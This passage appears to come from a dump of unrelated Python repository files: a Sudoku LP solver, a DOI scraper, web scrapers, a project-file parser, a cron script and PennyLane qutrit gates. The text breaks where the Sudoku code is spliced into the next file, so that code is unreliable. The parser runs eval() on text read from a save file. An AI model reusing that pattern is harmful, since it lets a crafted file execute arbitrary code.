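The interface above wraps phi into (-pi, pi] with a modulo followed by a shift; the same convention in isolation, as a small numpy sketch:

import numpy as np

phi = np.arctan2(np.array([1.0, -1.0]), np.array([-1.0, -1.0])) % (2.0 * np.pi)
phi[phi > np.pi] -= 2.0 * np.pi          # fold angles above pi back into range
assert np.all((phi > -np.pi) & (phi <= np.pi))
print(phi)                               # values now lie in (-pi, pi]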
#print(matrix)\r\n temp = defaultdict(list)\r\n marked_matrix = np.ones((9,9))\r\n for i in range(9):\r\n for j in range(9):\r\n mark = False\r\n val = matrix[i][j]\r\n temp[val].append([i,j])\r\n #print(val)\r\n \r\n for l in range(9):\r\n if matrix[l][j] == val and i!= l:\r\n mark = True\r\n\r\n marked_matrix[l][j] = 0\r\n temp[val]\r\n \r\n \r\n #print(marked_matrix)\r\n for k in range(9):\r\n if matrix[i][k]== val and k!= j:\r\n mark = True\r\n marked_matrix[i][k] = 0\r\n \r\n for res in boxes():\r\n if [i,j] in res:\r\n for each_sq in res:\r\n a = each_sq[0]\r\n b = each_sq[1]\r\n if matrix[a][b] == val and [a,b] != [i,j] :\r\n mark = True\r\n marked_matrix[a][b] = 0\r\n \r\n if mark == True:\r\n marked_matrix[i][j] = 0\r\n \r\n for i in range(9):\r\n for j in range(9):\r\n if marked_matrix[i][j] ==0:\r\n matrix[i][j] = 0\r\n for i in range(9):\r\n for j in range(9):\r\n if original[i][j] != 0 :\r\n matrix[i][j] = original[i][j]\r\n \r\n\r\n return matrix\r\n \r\n\r\n\r\ndef convert_stringtoarray(quiz):\r\n #can work for original and solution\r\n res = []\r\n count = 0\r\n for i in range(9):\r\n temp = []\r\n for j in range(9):\r\n temp.append(int(quiz[count]))\r\n count+=1\r\n res.append(temp)\r\n\r\n return res\r\n\r\ndef convert_matrixtolist(after_del):\r\n res = []\r\n for i in after_del:\r\n for j in i:\r\n res.append(j)\r\n \r\n return res\r\n\r\ndef solver(input_):\r\n \r\n quiz = input_\r\n constraint_ = input_\r\n iter_ = 0\r\n X_re = 0\r\n while(iter_<=5):\r\n \r\n A0 = fixed_constraints()\r\n A1 = clue_constraint(constraint_)\r\n # Formulate the matrix A and vector B (B is all ones).\r\n A = scs.vstack((A0,A1))\r\n A = A.toarray()\r\n B = np.ones(A.shape[0])\r\n # Because rank defficiency. We need to extract effective rank.\r\n u, s, vh = np.linalg.svd(A, full_matrices=False)\r\n K = np.sum(s > 1e-12)\r\n S = np.block([np.diag(s[:K]), np.zeros((K, A.shape[0]-K))])\r\n A = S@vh\r\n B = u.T@B\r\n B = B[:K]\r\n c = np.block([ np.ones(A.shape[1]), np.ones(A.shape[1]) ])\r\n\r\n G = np.block([[-np.eye(A.shape[1]), np.zeros((A.shape[1], A.shape[1]))],\\\r\n [np.zeros((A.shape[1], A.shape[1])), -np.eye(A.shape[1])]])\r\n h = np.zeros(A.shape[1]*2)\r\n H = np.block([A, -A])\r\n b = B\r\n L = 25\r\n epsilon = 10**-10\r\n\r\n #x_new = x_ori #? 
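The boxes() helper above enumerates all nine 3x3 blocks with explicit range checks; the same membership test reduces to integer division, sketched here (the function name is mine, not the repository's):

def box_index(i, j):
    # two cells share a 3x3 Sudoku box exactly when this index matches
    return (i // 3) * 3 + j // 3

assert box_index(0, 0) == 0
assert box_index(4, 7) == 5
assert box_index(8, 8) == 8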
or below one?\r\n x_top = np.zeros(A.shape[1])\r\n x_bottom = np.zeros(A.shape[1])\r\n x_ori = x_top - x_bottom\r\n for j in range(L):\r\n Weight = 1/(abs(x_ori)+1)\r\n\r\n\r\n W = np.block([Weight,Weight])\r\n\r\n\r\n cW = np.matrix(c*W)\r\n\r\n \r\n ret = sco.linprog(cW, G, h, H, b, method='interior-point', options={'tol':1e-10})\r\n x_new = ret.x[:A.shape[1]] - ret.x[A.shape[1]:]\r\n\r\n\r\n #x_new = np.reshape(x, (81, 9))\r\n if LA.norm((x_new - x_ori)) 0:\n # Sort items by published date (newest first)\n items = sorted(data['message']['items'], key=lambda x: x.get('created', {}).get('date-time'), reverse=True)\n \n # Prepare title for comparison\n title_lower = prepare_title(title)\n \n # Search for DOI\n for item in items:\n item_title = item.get('title', [''])[0]\n \n # Prepare title for comparison\n item_title_lower = prepare_title(item_title)\n\n # print('Comparing:\\n', title_lower, '\\n', item_title_lower, '\\n') # (debug)\n \n # Compare titles\n if title_lower in item_title_lower:\n doi = item['DOI']\n if not doi.endswith('.vid'):\n return doi\n \n return ''\n\ndef process_bib_line(line, current_item):\n if line.startswith('@'):\n if current_item:\n updated_bib_data.append(current_item.strip())\n current_item = line.strip()\n return current_item\n \n if current_item and line.startswith('}'):\n if 'doi' not in current_item.lower() and '@book' not in current_item.lower():\n title_match = title_regex.search(current_item)\n if title_match:\n title = title_match.group(1).strip()\n # Remove additional curly braces\n title = re.sub(r'[{}]', '', title)\n # Get doi\n doi = get_doi(title)\n if doi:\n # Adjusted indentation for field name\n indent = ' ' * INDENT_PRE\n # Adjusted indentation for field line\n field_line = f'{indent}doi{\" \" * (INDENT_POST - 3)} = {{{doi}}}'\n # Append DOI field with indentation\n current_item += ',\\n' + field_line \n # Print DOI found\n print('DOI found for article:', title, '->', doi)\n else:\n # Print DOI not found\n print('DOI not found for article:', title)\n \n current_item += '\\n' + line.strip()\n updated_bib_data.append(current_item)\n current_item = ''\n else:\n if '=' in line:\n field_name, field_value = line.split('=', 1)\n field_name = field_name.strip()\n field_value = field_value.strip()\n indent = ' ' * (INDENT_POST - len(field_name))\n line = f'{field_name} {indent}= {field_value}'\n current_item += '\\n' + ' ' * INDENT_PRE + line.strip()\n \n return current_item\n\n\n# Compile the regular expressions\ntitle_regex = re.compile(r'title\\s*=\\s*\\{([^}]*)\\}')\n\nwith open(input_file, 'r') as f:\n bib_data = f.readlines()\n\n# Search and fill missing DOIs\nupdated_bib_data = []\ncurrent_item = ''\n\nfor line in bib_data:\n current_item = process_bib_line(line, current_item)\n\n# Save the updated .bib file\nif current_item:\n updated_bib_data.append(current_item.strip())\n\nupdated_bib_content = '\\n'.join(updated_bib_data)\n\nwith open(output_file, 'w') as f:\n f.write(updated_bib_content)\n\nprint('Updated .bib file saved as', output_file)\n","repo_name":"AlbertoCuadra/doi_scraper","sub_path":"doi_scraper.py","file_name":"doi_scraper.py","file_ext":"py","file_size_in_byte":4374,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"5239534865","text":"import re\nimport just\nimport json\nimport pandas as pd\nimport getpass\n\nfrom nostalgia.ndf import NDF\nfrom nostalgia.times import tz\n\nlogin_url = \"https://s.sleepcycle.com/site/login\"\nexport_url = 
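The BibTeX title extraction in the DOI-scraper record above hinges on a single regular expression; a quick self-contained demonstration of what it captures:

import re

title_regex = re.compile(r'title\s*=\s*\{([^}]*)\}')
entry = '@article{key, title = {A Study of Things}, year = {2020}}'
print(title_regex.search(entry).group(1))   # A Study of Things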
\"https://s.sleepcycle.com/export/original\"\n\n\nclass SleepCycle(NDF):\n @classmethod\n def ingest(cls, credentials, **kwargs):\n html = just.get(login_url)\n token = re.findall('name=\"csrftoken\" value=\"([^\"]+)', html)[0]\n\n data = {\n \"username\": credentials.username,\n \"csrftoken\": token,\n \"password\": credentials.password,\n }\n _ = just.post(login_url, data=data)\n\n str_data = just.get(\"https://s.sleepcycle.com/export/original\")\n\n start = str_data.index(\"data_json.txt\") + len(\"data_json.txt\")\n end = str_data[start:].index(\"}]PK\") + 2\n\n data = json.loads(str_data[start:][:end])\n\n xs = []\n ys = []\n nums = []\n for num, x in enumerate(data):\n res = []\n times = []\n if len(x[\"events\"]) < 15:\n continue\n for y in x[\"events\"]:\n res.append(y[-1])\n times.append(y[0])\n nums.append(num)\n xs.extend(\n [\n pd.Timestamp(x[\"start\"], tz=tz) + pd.Timedelta(seconds=int(y))\n for y in pd.Series(times).rolling(15).mean().fillna(method=\"bfill\")\n ]\n )\n ys.extend(pd.Series(res).rolling(15).mean().fillna(method=\"bfill\"))\n df = pd.DataFrame({\"time\": xs, \"score\": ys, \"num\": nums}).drop_duplicates()\n df[\"score\"] = df[\"score\"].clip(0, 0.025)\n\n cls.save_df(df)\n\n return cls(df)\n","repo_name":"nostalgia-dev/nostalgia","sub_path":"nostalgia/sources/sleepcycle.py","file_name":"sleepcycle.py","file_ext":"py","file_size_in_byte":1710,"program_lang":"python","lang":"en","doc_type":"code","stars":160,"dataset":"github-code","pt":"52"} +{"seq_id":"2378063419","text":"from selenium import webdriver\nfrom selenium.webdriver.chrome.service import Service\nfrom bs4 import BeautifulSoup\nimport pandas as pd\nimport time\n\n\nopsi = webdriver.ChromeOptions()\nopsi.add_argument('--headless')\nservices = Service('chromedriver')\ndriver = webdriver.Chrome(service=services, options=opsi)\n\nshopee_link = 'https://shopee.co.id/search?keyword=macbook'\ndriver.set_window_size(1300,800)\ndriver.get(shopee_link)\n\nrentang = 800\nfor i in range(1,7):\n akhir = rentang*i\n perintah = \"window.scrollTo(0,\"+str(akhir)+\")\"\n driver.execute_script(perintah)\n print('loading ke-'+str(i))\n time.sleep(1)\n\ntime.sleep(30)\n\ndriver.save_screenshot(\"home.png\")\ncontent = driver.page_source\ndriver.quit\n\ndata = BeautifulSoup(content, 'html.parser')\n# print(data.encode(\"utf-8\"))\ni = 1\nbase_url = 'https://shopee.co.id'\n\nno,list_nama, list_gambar, list_harga, list_link, list_terjual, list_lokasi = [],[],[],[],[],[],[]\n\nfor area in data.find_all('div', class_=\"col-xs-2-4 shopee-search-item-result__item\"):\n print(i)\n nama = area.find('div', class_=\"ie3A+n bM+7UW Cve6sh\").get_text()\n gambar = area.find('img', class_=\"_7DTxhh vc8g9F\")['src']\n\n if gambar != None:\n gambar = area.find('img', class_=\"_7DTxhh vc8g9F\")['src']\n else:\n gambar = '-'\n\n harga = area.find('span', class_=\"ZEgDH9\").get_text()\n link = base_url + area.find('a')['href']\n terjual = area.find('div', class_=\"r6HknA uEPGHT\") \n\n if terjual != None:\n terjual = area.find('div', class_=\"r6HknA uEPGHT\").get_text()\n else:\n terjual = '0 Terjual'\n\n lokasi = area.find('div', class_=\"zGGwiV\").get_text()\n\n no.append(i)\n list_nama.append(nama)\n list_gambar.append(gambar)\n list_harga.append(harga)\n list_link.append(link)\n list_terjual.append(terjual)\n list_lokasi.append(lokasi)\n i += 1\n print(\"------\")\n\ndf = pd.DataFrame({'No':no,'Nama':list_nama,'Gambar':list_gambar,'Harga':list_harga,'Link':list_link,'Terjual':list_terjual,'Lokasi':list_lokasi})\nwriter = 
pd.ExcelWriter('Macbook.xlsx')\ndf.to_excel(writer,'Sheet1',index=False)\nwriter.save()","repo_name":"fahmiSD/scrapingPy","sub_path":"scraping.py","file_name":"scraping.py","file_ext":"py","file_size_in_byte":2106,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"33806414976","text":"import time\nimport os\nimport enum\nimport json\nimport csv\nimport myc\n\n\nclass FileTypeCustome(enum.Enum):\n Project_Type = enum.auto()\n Graph_Data_Type_csv = enum.auto()\n Graph_Data_Type_json = enum.auto()\n Unknown_Type = enum.auto()\n Graph_Data_Image = enum.auto()\n\n\ndef xml_serializer(tobe: object):\n # print(\"serializer\")\n # print(repr(tobe))\n # \"\" -> \"bool\"\n T = str(type(tobe)).strip(\"<\").strip(\">\").strip(\"class\").strip(\" \")[1:-1]\n if T == \"bool\":\n # conv bool to int because that what python do anyway\n T = \"int\"\n ret_str = f\"[{T}]\"\n ret_str += \"{\\n\"\n if T == \"str\":\n # idk str types dissapear so here a bypass fix\n return \"[str]{\" + str(repr(tobe)) + \"}\\n\"\n # well to be effective any iter type doesn't work sooooo ...\n # if isinstance(my_iterable, (list, tuple, set, dict)):\n if T == \"dict\":\n # special for dict\n return \"[dict]\" + json.dumps(tobe) + \"\\n\"\n elif T == \"list\" or T == \"set\" or T == \"tuple\":\n # serializer by iter\n ret_str += \"(\"\n for x in tobe:\n ret_str += xml_serializer(x) + \",\"\n ret_str = ret_str[:-1]\n ret_str += \")\"\n ret_str += \"}\\n\"\n return ret_str\n else:\n # serializer by attr\n for attr in dir(tobe):\n if callable(getattr(tobe, attr)) or \"__\" in attr:\n continue\n # NOTE : just check if type of type is not first type\n # if attr == \"denominator\":\n # return \"[int]{\" + str(tobe) + \"}\\n\"\n if type(getattr(tobe, attr)) == type(tobe):\n # recursive type see note above\n # int(denominator=[int]->denominator.....)\n return f\"[{T}]\" + \"{\" + str(repr(tobe)) + \"}\"\n se = xml_serializer(getattr(tobe, attr))\n # print(se)\n ret_str += f\"{attr}={se},\" if se else \"\"\n # print(repr(ret_str))\n # remove the last char\n ret_str = ret_str[:-1]\n ret_str += \"}\\n\"\n return ret_str\n\n\ndef xml_parser(txt: str):\n print(\"parsing ...\")\n stack = []\n types = []\n args = []\n word = \"\"\n flag = False\n should_be = False\n should_be_two = False\n i = 0\n # print(txt)\n try:\n while i < len(txt):\n char = txt[i]\n # print(i, \"stack\", stack, \"types\", types,\"args\", args, \"word\", word, char)\n if word == \"Save_Project.xml\":\n flag = True\n word = \"\"\n elif char == \"\\n\":\n pass\n elif char == \",\":\n if not should_be and types[-1] != \"dict\":\n print(\" ',' not where it belong but anyway\")\n # raise RuntimeError(\" ',' not where it belong\")\n should_be = False\n elif char == \"[\":\n stack.append(\"]\")\n if word:\n args[len(types)-1].append(word)\n args.append([])\n word = \"\"\n elif char == \"{\":\n stack.append(\"}\")\n elif char == \"]\":\n if char != stack.pop():\n raise RuntimeError(\"parsing file wrong\")\n if word == \"dict\":\n inner_idk = \"\"\n i += 1\n while not txt[i-1] == \"}\":\n inner_idk += txt[i]\n i += 1\n # print(args, types)\n # print(inner_idk)\n args.pop()\n args[-1].append(json.loads(inner_idk))\n else:\n types.append(word)\n word = \"\"\n elif char == \"}\":\n if char != stack.pop():\n raise RuntimeError(\"parsing file wrong\")\n should_be = False\n # NOTE : eval here danger but don't worry\n T = types.pop()\n args[len(types)].append(word)\n # print(\"parsing Types\", T)\n if T == \"NoneType\":\n 
args.pop()\n args[len(types)-1].append(None)\n else:\n # print(\"eval that\")\n # print(\"stack : \", stack)\n # print(\"types : \", types)\n # print(\"args : \", args)\n # print(\"word : \", word)\n local_arg = [str(x) for x in args.pop()]\n # formating args\n # need to work with arg | arg,arg | arg = parameter ect\n format_arg = \"\"\n if not len(local_arg):\n format_arg = \",\"\n elif len(local_arg) == 1:\n # args[len(types)].append(word) || work == local_arg\n format_arg = word\n format_arg += \",\"\n else:\n # good old ways\n j = 0\n kwarg = False\n while j != len(local_arg):\n # print(format_arg)\n if \"=\" in local_arg[j]:\n # kwarg\n kwarg = True\n format_arg += local_arg[j]\n # check where is the \"=\"\n if (j+1) <= len(local_arg):\n # it could be in one single str\n if local_arg[j].split(\"=\")[1]:\n pass\n else:\n # else grab the next arg\n j += 1\n format_arg += local_arg[j]\n else:\n # end of stack\n print(i, \"stack\", stack, \"types\", types,\n \"args\", args, \"word\", word, char)\n raise RuntimeError(\n f\"parser kwarg : no more arg after = {local_arg[j]}\\n; j {j} ;len(local_arg) {len(local_arg)}\")\n format_arg += \",\"\n elif not kwarg:\n format_arg += local_arg[j]\n if local_arg[j] != \"(\" and local_arg[j] != \")\":\n format_arg += \",\"\n elif \"=\" not in local_arg[j] and kwarg:\n print(\"args after kwarg in parser ignore\",\n j, local_arg[j])\n if i+1 == len(local_arg):\n # if last arg after kwarg ignore append \",\" else char disapear\n format_arg += \",\"\n else:\n raise RuntimeError(\"unreachable\")\n j += 1\n # remove last \",\"\n if format_arg[-1] == \")\":\n # can't forget the trailing )\n format_arg = format_arg[:-2]\n format_arg += \")\"\n else:\n format_arg = format_arg[:-1]\n # format if last types\n # final conversion else there is a\n # pop on empty list so set the flag\n idk_flag = False\n if len(types)-1 < 0:\n idk_flag = True\n args.append([])\n # last one convertion\n # print(\"args\",args)\n # print(\"format_arg\", format_arg)\n # print(\n # f\"args[{len(types)-1}].append(eval({repr(T)}+\\\"(\\\"+{repr(format_arg)}+\\\")\\\"))\")\n # print()\n # try to eval if args not accepted at all try without (aka default values > none)\n try:\n args[len(types)-1].append(repr(eval(T+\"(\"+format_arg+\")\")))\n except Exception as ex:\n # print(ex)\n args[len(types)-1].append(repr(eval(T+\"()\")))\n if idk_flag:\n # actually with the repr to do with the strings\n # the return is in the forme of a lovely formated string\n # project(save_file_path='', menu_stack=[], GLOBAL={}, DATA_W=False)\n # but we need to eval it one more time to return it\n # no even going to try except it because how could there be an error we don't eval before\n # also the class type name is wrong\n # project -> myc.project\n # print(\"RETURN FINISH\")\n # print(args)\n args[-1][-1] = eval(T+\"(\"+format_arg+\")\")\n # print(\"eval\",args)\n should_be = True\n word = \"\"\n else:\n if should_be_two:\n # it doesn't work to well\n # as a matter of fact it work but it was the serializer\n print(str(i)+\" ',' expected but anyway\")\n should_be = False\n should_be_two = False\n if should_be:\n should_be_two = True\n word += char\n i += 1\n ret = args.pop()\n if len(args) or len(stack) or len(types) or not flag:\n raise RuntimeError(\"parser finish wrong\")\n return ret\n except Exception as ex:\n # all of thoses print are for debuging\n # print(\"error while casting in parsing project file\")\n # print(\"flag : \", flag)\n # print(\"stack : \", stack)\n # print(\"types : \", types)\n # 
print(\"args : \", args)\n # print(\"word : \", word)\n print(\"error in xml project file parser\")\n print(ex)\n raise ex\n # delete singleton intance to have default one\n myc.project._instances.pop()\n return [myc.project()]\n\n\ndef parse_Project_file(path: str = \"\"):\n if path:\n path = os.path.abspath(path)\n else:\n path = os.path.abspath(\n myc.project().save_file_path + \"./Save_Project.xml\")\n try:\n with open(path, \"r\") as f:\n # save old variable like path we want to keep\n local_pygame = myc.project().pygame\n local_tkinter = myc.project().tkinter\n local_gen = myc.project().gen\n # local_menu_stack = myc.project().menu_stack.copy()\n # here is a litlle trick\n # NOTE : menu stack set to None for the redirect import loop\n # should be reset by the parsing\n myc.project().menu_stack = None\n # we shoudl have that by reparsing the project file\n # however if the file is just a decoy then we known and reparse it\n # parse xml file with the custome parser\n objs = xml_parser(f.read(-1))\n if len(objs) > 1:\n raise RuntimeError(\n \"something worng at parsing project file , not suppose to have more than one object in file\")\n obj = objs[0]\n if obj.menu_stack is None:\n print(\"reparsing\")\n return parse_Project_file()\n # if we use the same graphic api we can reuse the api\n if (local_pygame and obj.tkinter) or (local_tkinter and obj.pygame):\n obj.menu_stack = [] # local_menu_stack\n if myc.project().menu_stack is None or not len(myc.project().menu_stack):\n if myc.project().pygame:\n raise NotImplementedError\n elif myc.project().tkinter:\n myc.project().menu_stack = [\"init\"]\n else:\n myc.project().menu_stack = []\n # print(\"parser obj\", obj)\n obj.pygame = local_pygame\n if local_pygame:\n obj.tkinter = False\n obj.pygame = True\n else:\n obj.tkinter = local_tkinter\n obj.pygame = False\n myc.project().gen = local_gen\n myc.project().DATA_W = False\n except Exception as ex:\n print(ex)\n\n\ndef parse_cvs_DATA(path: str = \"\"):\n if path:\n path = os.path.abspath(path)\n else:\n path = os.path.abspath(myc.project().save_file_path + \"./csv.csv\")\n try:\n with open(path, \"r\") as f:\n myc.project().DATA_W = False\n myc.project().DATA = []\n reader = csv.reader(f.read(-1), delimiter=\";\")\n num_rows = int(next(reader)[0])\n next(reader)\n num_columns = int(next(reader)[0])\n next(reader)\n x = list(reader)\n xi = 0\n for i in range(num_rows):\n myc.project().DATA.append([])\n for j in range(num_columns):\n # print(myc.project().DATA,i,j,xi,x)\n myc.project().DATA[i].append(int(x[xi][0]))\n xi += 2\n except Exception as ex:\n myc.project().DATA = None\n print(ex)\n myc.project().DATA_W = False\n quick_cache_save()\n\n\ndef save_cvs_DATA(path: str = \"\"):\n if path:\n path = os.path.abspath(path)\n else:\n path = os.path.abspath(\n myc.project().save_file_path + \"./csv.csv\")\n myc.project().conv_to_N()\n try:\n with open(path, \"w\") as f:\n f.write(str(myc.project().get_size()[0]))\n f.write(\"\\n\")\n f.write(str(myc.project().get_size()[1]))\n f.write(\"\\n\")\n for row in myc.project().DATA:\n for k, element in enumerate(row):\n f.write(str(int(element)))\n if k != myc.project().get_size()[1]-1:\n f.write(\";\")\n f.write(\"\\n\")\n except Exception as ex:\n print(ex)\n\n\ndef parse_json_DATA(path: str = \"\"):\n if path:\n path = os.path.abspath(path)\n else:\n path = os.path.abspath(myc.project().save_file_path + \"./json.json\")\n try:\n myc.project().DATA = json.load(open(path, \"r\"))\n # print(myc.project().DATA)\n print(\"json data imported\")\n except 
Exception as ex:\n myc.project().DATA_W = False\n myc.project().DATA = None\n print(ex)\n if isinstance(myc.project().DATA,dict):\n myc.project().DATA_W = True\n myc.project().conv_to_N()\n else:\n myc.project().DATA_W = False\n mode = myc.project().DATA_W\n quick_cache_save()\n myc.project().DATA_W = False ###! mode\n\n\ndef save_json_DATA(path: str = \"\"):\n if path:\n path = os.path.abspath(path)\n else:\n path = os.path.abspath(\n myc.project().save_file_path + \"./json.json\")\n try:\n myc.project().DATA_W = True\n json.dump(myc.project().conv_to_N().DATA, open(path, \"w\"))\n except Exception as ex:\n print(ex)\n\n\ndef quick_cache_save(path: str = \"\"):\n if path:\n path = os.path.abspath(path+\"./Save_Project.xml\")\n else:\n path = os.path.abspath(\n myc.project().save_file_path + \"./Save_Project.xml\")\n myc.project().DATA_W = False\n if myc.project().menu_stack is None or not len(myc.project().menu_stack):\n if myc.project().pygame:\n raise NotImplementedError\n elif myc.project().tkinter:\n myc.project().menu_stack = [\"init\"]\n else:\n myc.project().menu_stack = []\n try:\n with open(path, \"w\") as f:\n f.write(\"Save_Project.xml\\n\")\n f.write(\"[myc.project]{\")\n f.write(\"\\nDATA=\"+xml_serializer(myc.project().DATA))\n ###! f.write(\",DATA_W=\"+xml_serializer(myc.project().DATA_W))\n f.write(\",pygame=\"+xml_serializer(myc.project().pygame))\n f.write(\",tkinter=\"+xml_serializer(myc.project().tkinter))\n f.write(\",menu_stack=\"+xml_serializer(myc.project().menu_stack))\n f.write(\",resolver_mode=\"+xml_serializer(myc.project().resolver_mode))\n f.write(\",save_file_path=\" +\n (xml_serializer(myc.project().save_file_path) if myc.project().save_file_path else \"'./'\"))\n f.write(\"}\")\n except Exception as ex:\n print(ex)\n\n\ndef parse_file_all(path: str = None):\n if path is None:\n print(\"path is None in parse_file_all arg\")\n return FileTypeCustome.Unknown_Type\n print(\"parsing all\", path)\n ext = os.path.basename(path)[-3:]\n if ext == \".py\":\n return FileTypeCustome.Unknown_Type\n ext = os.path.basename(path)[-4:]\n if ext == \".xml\":\n parse_Project_file(path)\n return FileTypeCustome.Project_Type\n elif ext == \".csv\":\n parse_cvs_DATA(path)\n return FileTypeCustome.Graph_Data_Type_csv\n elif os.path.basename(path)[-5:] == \".json\":\n parse_json_DATA(path)\n return FileTypeCustome.Graph_Data_Type_json\n return FileTypeCustome.Unknown_Type\n\n\ndef quick_cache_load():\n if os.path.exists(os.path.abspath(myc.project().save_file_path + \"./Save_Project.xml\")):\n print(\"loading cache project...\")\n parse_Project_file(os.path.abspath(\n myc.project().save_file_path + \"./Save_Project.xml\"))\n else:\n print(\"no cache project file\")\n # print(myc.project().DATA)\n\n quick_cache_save()\n\n\nif __name__ == \"__main__\":\n quick_cache_save()\n time.sleep(1)\n print(quick_cache_load())\n","repo_name":"glados-creator/NSI_lycee","sub_path":"terminal/NSI_Projet_4/my_parser.py","file_name":"my_parser.py","file_ext":"py","file_size_in_byte":17806,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"35719424440","text":"\"\"\"\nThis file runs a basic cronjob every day to send a request to a PHP server\nthat gets and updates the current live WHO video.\n\"\"\"\n\nimport schedule\nimport requests\nfrom datetime import date, datetime\nfrom time import gmtime, strftime, sleep\n\ncountries = 
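The hand-rolled serializer in my_parser.py above exists to persist simple project state; for state made of plain dicts, lists, and scalars, the standard json module already round-trips losslessly, as this sketch shows (toy state, not the project's actual fields):

import json

state = {"menu_stack": ["init"], "resolver_mode": 0, "save_file_path": "./"}
assert json.loads(json.dumps(state)) == state   # lossless round trip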
[\"ae\",\"ar\",\"at\",\"au\",\"be\",\"bg\",\"br\",\"ca\",\"ch\",\"cn\",\"co\",\"cu\",\"cz\",\"de\",\"eg\",\"fr\",\"gb\",\"gr\",\"hk\",\"hu\",\"id\",\"ie\",\"il\",\"in\",\"it\",\"jp\",\"kr\",\"lt\",\"lv\",\"ma\",\"mx\",\"my\",\"ng\",\"nl\",\"no\",\"nz\",\"ph\",\"pl\",\"pt\",\"ro\",\"rs\",\"ru\",\"sa\",\"se\",\"sg\",\"si\",\"sk\",\"th\",\"tr\",\"tw\",\"ua\",\"us\",\"ve\",\"za\"];\n\n# function to be run every minute\ndef live_updates():\n request = requests.get(\"https://covid19.xtrp.io/server/get_live_updates.php\")\n if(request.status_code == 200):\n print('Successful request with message: ' + request.text)\n else:\n print(\"ERROR: \" + str(request.status_code))\n\n# run function initially\nlive_updates()\n\n# start and run cronjob\nschedule.every().day.at(\"12:00\").do(live_updates)\n\nwhile True:\n schedule.run_pending()\n sleep(20)","repo_name":"xtrp/Coronavirus-Live-Monitor","sub_path":"cronjobs/live_updates.py","file_name":"live_updates.py","file_ext":"py","file_size_in_byte":1001,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"52"} +{"seq_id":"39096162610","text":"\nfrom .model import Model\nfrom .engine import Engine, BasicEngine\nfrom .activation import *\n\nclass Simulation:\n \"\"\"A self-contained simulation\"\"\"\n\n def __init__(self, \n model: Model,\n engine: Engine = None,\n steps: int = 10\n ):\n\n self._model = model \n self._engine = engine if engine else BasicEngine()\n self._steps = steps\n\n def run(self, steps = None):\n self._model.init_data()\n self._engine.run(self._model, steps if steps else self._steps)\n\n self.agent_data = self._model.agent_data().copy()\n self.model_data = self._model.model_data().copy()\n\n\n","repo_name":"dannygale/crowd","sub_path":"crowd/sim.py","file_name":"sim.py","file_ext":"py","file_size_in_byte":651,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"31504173012","text":"import numpy as np\n\nfrom pennylane.operation import Operation, AdjointUndefinedError\nfrom pennylane.wires import Wires\n\nOMEGA = np.exp(2 * np.pi * 1j / 3)\nZETA = OMEGA ** (1 / 3) # ZETA will be used as a phase for later non-parametric operations\n\n\nclass TShift(Operation):\n r\"\"\"TShift(wires)\n The qutrit shift operator\n\n The construction of this operator is based on equation 1 from\n `Yeh et al. (2022) `_.\n\n .. math:: TShift = \\begin{bmatrix}\n 0 & 0 & 1 \\\\\n 1 & 0 & 0 \\\\\n 0 & 1 & 0\n \\end{bmatrix}\n\n **Details:**\n\n * Number of wires: 1\n * Number of parameters: 0\n\n Args:\n wires (Sequence[int] or int): the wire the operation acts on\n \"\"\"\n num_wires = 1\n \"\"\"int: Number of wires that the operator acts on.\"\"\"\n\n num_params = 0\n \"\"\"int: Number of trainable parameters that the operator depends on.\"\"\"\n\n @staticmethod\n def compute_matrix():\n r\"\"\"Representation of the operator as a canonical matrix in the computational basis (static method).\n\n The canonical matrix is the textbook matrix representation that does not consider wires.\n Implicitly, this assumes that the wires of the operator correspond to the global wire order.\n\n .. 
seealso:: :meth:`~.TShift.matrix`\n\n Returns:\n ndarray: matrix\n\n **Example**\n\n >>> print(qml.TShift.compute_matrix())\n [[0 0 1]\n [1 0 0]\n [0 1 0]]\n \"\"\"\n return np.array([[0, 0, 1], [1, 0, 0], [0, 1, 0]])\n\n @staticmethod\n def compute_eigvals():\n r\"\"\"Eigenvalues of the operator in the computational basis (static method).\n\n If :attr:`diagonalizing_gates` are specified and implement a unitary :math:`U^{\\dagger}`,\n the operator can be reconstructed as\n\n .. math:: O = U \\Sigma U^{\\dagger},\n\n where :math:`\\Sigma` is the diagonal matrix containing the eigenvalues.\n\n Otherwise, no particular order for the eigenvalues is guaranteed.\n\n .. seealso:: :meth:`~.TShift.eigvals`\n\n Returns:\n array: eigenvalues\n\n **Example**\n\n >>> print(qml.TShift.compute_eigvals())\n [ -0.5+0.8660254j -0.5-0.8660254j 1. +0.j ]\n \"\"\"\n return np.array([OMEGA, OMEGA**2, 1])\n\n # TODO: Add compute_decomposition once parametric ops are added.\n\n def pow(self, z):\n return super().pow(z % 3)\n\n\nclass TClock(Operation):\n r\"\"\"TClock(wires)\n Ternary Clock gate\n\n The construction of this operator is based on equation 1 from\n `Yeh et al. (2022) `_.\n\n .. math:: TClock = \\begin{bmatrix}\n 1 & 0 & 0 \\\\\n 0 & \\omega & 0 \\\\\n 0 & 0 & \\omega^2\n \\end{bmatrix}\n\n where :math:`\\omega = e^{2 \\pi i / 3}`.\n\n **Details:**\n\n * Number of wires: 1\n * Number of parameters: 0\n\n Args:\n wires (Sequence[int] or int): the wire the operation acts on\n \"\"\"\n num_wires = 1\n \"\"\"int: Number of wires that the operator acts on.\"\"\"\n\n num_params = 0\n \"\"\"int: Number of trainable parameters that the operator depends on.\"\"\"\n\n @staticmethod\n def compute_matrix():\n r\"\"\"Representation of the operator as a canonical matrix in the computational basis (static method).\n\n The canonical matrix is the textbook matrix representation that does not consider wires.\n Implicitly, this assumes that the wires of the operator correspond to the global wire order.\n\n .. seealso:: :meth:`~.TClock.matrix`\n\n Returns:\n ndarray: matrix\n\n **Example**\n\n >>> print(qml.TClock.compute_matrix())\n [[ 1. +0.j 0. +0.j 0. +0.j ]\n [ 0. +0.j -0.5+0.8660254j 0. +0.j ]\n [ 0. +0.j 0. +0.j -0.5-0.8660254j]]\n \"\"\"\n return np.diag([1, OMEGA, OMEGA**2])\n\n @staticmethod\n def compute_eigvals():\n r\"\"\"Eigenvalues of the operator in the computational basis (static method).\n\n If :attr:`diagonalizing_gates` are specified and implement a unitary :math:`U^{\\dagger}`,\n the operator can be reconstructed as\n\n .. math:: O = U \\Sigma 